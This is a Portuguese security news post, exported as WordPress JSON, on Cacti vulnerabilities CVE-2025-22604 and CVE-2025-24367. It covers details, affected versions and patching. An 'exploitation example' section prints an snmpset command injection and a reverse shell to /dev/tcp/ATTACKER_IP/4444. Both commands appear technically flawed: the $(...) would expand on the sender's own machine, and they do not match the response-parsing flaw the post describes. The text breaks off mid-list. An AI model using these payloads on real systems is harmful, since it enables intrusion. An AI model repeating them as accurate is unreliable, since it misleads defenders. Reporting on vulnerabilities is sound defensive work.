{"id":21643,"date":"2025-01-31T12:16:50","date_gmt":"2025-01-31T15:16:50","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=21643"},"modified":"2025-01-31T12:16:51","modified_gmt":"2025-01-31T15:16:51","slug":"vulnerabilidade-no-cacti-permite-execucao-remota-de-codigo","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2025\/01\/exploits\/vulnerabilidade-no-cacti-permite-execucao-remota-de-codigo\/","title":{"rendered":"Vulnerabilidade no Cacti permite execu\u00e7\u00e3o remota de c\u00f3digo"},"content":{"rendered":"\n

Vulnerabilidade cr\u00edtica no Cacti (CVE-2025-22604) permite execu\u00e7\u00e3o remota de c\u00f3digo<\/strong><\/p>\n

Uma vulnerabilidade cr\u00edtica foi descoberta no Cacti, um framework de c\u00f3digo aberto para monitoramento de rede e gerenciamento de falhas, que pode permitir que um atacante autenticado execute c\u00f3digo remotamente em inst\u00e2ncias vulner\u00e1veis. A falha, registrada como\u00a0CVE-2025-22604<\/strong>, possui uma pontua\u00e7\u00e3o CVSS de\u00a09.1<\/strong>\u00a0(em uma escala de 0 a 10), indicando um alto n\u00edvel de gravidade.<\/p>\n

\u00a0<\/p>\n

Detalhes da vulnerabilidade<\/strong><\/p>\n

De acordo com os mantenedores do projeto, a vulnerabilidade reside no\u00a0parser de resultados SNMP de m\u00faltiplas linhas. Usu\u00e1rios autenticados podem injetar\u00a0OIDs malformados\u00a0na resposta SNMP. Quando processados pelas fun\u00e7\u00f5es\u00a0ss_net_snmp_disk_io()<\/code><\/strong>\u00a0ou\u00a0ss_net_snmp_disk_bytes()<\/code><\/strong>, parte do OID \u00e9 usada como chave em um array que, por sua vez, \u00e9 utilizado como parte de um comando do sistema. Isso resulta em uma\u00a0vulnerabilidade de execu\u00e7\u00e3o de comandos.<\/p>\n

A explora\u00e7\u00e3o bem-sucedida dessa falha pode permitir que um usu\u00e1rio autenticado com permiss\u00f5es de gerenciamento de dispositivos execute\u00a0c\u00f3digo arbitr\u00e1rio\u00a0no servidor, possibilitando a\u00a0exfiltra\u00e7\u00e3o, edi\u00e7\u00e3o ou exclus\u00e3o de dados sens\u00edveis.<\/p>\n

\u00a0<\/p>\n

Vers\u00f5es afetadas<\/strong><\/p>\n

A vulnerabilidade\u00a0CVE-2025-22604<\/strong>\u00a0afeta todas as vers\u00f5es do Cacti\u00a0anteriores e incluindo a 1.2.28<\/strong>. A corre\u00e7\u00e3o foi implementada na vers\u00e3o\u00a01.2.29<\/strong>, lan\u00e7ada recentemente. O pesquisador de seguran\u00e7a conhecido pelo pseud\u00f4nimo\u00a0u32i<\/strong>\u00a0foi creditado pela descoberta e reporte da falha.<\/p>\n

\u00a0<\/p>\n

Outra vulnerabilidade corrigida<\/strong><\/p>\n

Al\u00e9m do CVE-2025-22604, a vers\u00e3o 1.2.29 tamb\u00e9m corrige outra vulnerabilidade cr\u00edtica, registrada como\u00a0CVE-2025-24367<\/strong>\u00a0(CVSS 7.2). Essa falha permite que um atacante autenticado crie\u00a0scripts PHP arbitr\u00e1rios\u00a0no diret\u00f3rio raiz da aplica\u00e7\u00e3o, abusando da funcionalidade de cria\u00e7\u00e3o de gr\u00e1ficos e templates de gr\u00e1ficos. Isso pode levar \u00e0\u00a0execu\u00e7\u00e3o remota de c\u00f3digo.<\/p>\n

\u00a0<\/p>\n

Exemplo de explora\u00e7\u00e3o<\/strong><\/p>\n

Abaixo, alguns exemplos de como um invasor pode explorar a vulnerabilidade para executar comandos arbitr\u00e1rios:<\/p>\n

\u00a0<\/p>\n

1. Explorando a inje\u00e7\u00e3o de OID malformado<\/strong><\/p>\n

snmpset -v2c -c public TARGET_HOST \\\n1.3.6.1.4.1.2025.1.1.1.1.1 s \"$(id > \/tmp\/pwned)\"<\/strong>
<\/code><\/pre>\n
Esse comando tenta injetar um OID malformado que executa id > \/tmp\/pwned<\/code> no servidor vulner\u00e1vel, criando um arquivo contendo as informa\u00e7\u00f5es do usu\u00e1rio que executou o comando.<\/p>\n
\u00a0<\/p>\n
2. Criando um Shell remoto<\/strong><\/p>\n
Se o servidor for vulner\u00e1vel, \u00e9 poss\u00edvel executar um shell reverso para ganhar acesso remoto:<\/p>\n
snmpset -v2c -c public TARGET_HOST \\\n1.3.6.1.4.1.2025.1.1.1.1.1 s \"$(bash -i >& \/dev\/tcp\/ATTACKER_IP\/4444 0>&1)\"<\/strong>
<\/code><\/pre>\n
Este comando faz com que o servidor estabele\u00e7a uma conex\u00e3o reversa para a m\u00e1quina do atacante na porta 4444, permitindo execu\u00e7\u00e3o remota de comandos.<\/p>\n
\u00a0<\/p>\n
Recomenda\u00e7\u00f5es de seguran\u00e7a<\/strong><\/p>\n
Considerando que vulnerabilidades no Cacti j\u00e1 foram\u00a0exploradas ativamente\u00a0no passado, organiza\u00e7\u00f5es que dependem do software para monitoramento de rede devem\u00a0priorizar a aplica\u00e7\u00e3o dos patches\u00a0necess\u00e1rios para mitigar os riscos de comprometimento.<\/p>\n
\u00a0<\/p>\n
Para mitigar essa vulnerabilidade, \u00e9 altamente recomend\u00e1vel:<\/p>\n